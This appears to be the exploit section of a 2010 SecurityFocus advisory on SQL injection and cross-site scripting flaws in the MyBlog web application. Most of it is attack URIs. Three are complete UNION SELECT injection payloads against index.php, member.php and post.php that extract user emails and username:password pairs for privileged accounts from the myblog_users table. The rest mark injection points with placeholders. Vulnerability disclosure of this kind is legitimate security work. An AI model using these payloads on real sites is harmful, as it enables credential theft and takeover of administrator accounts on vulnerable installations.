MyBlog Cross-Site Scripting and SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/os/index.php?view=[SQLInjection]
http://www.example.com/os/member.php?id=[SQLInjection]
http://www.example.com/os/post.php?id=[SQLInjection]
http://www.example.com/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
http://www.example.com/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1
http://www.example.com/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
http://www.example.com/os/index.php?s=[XSS]
http://www.example.com/os/index.php?sort=[XSS]
http://www.example.com/os/post.php?id=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus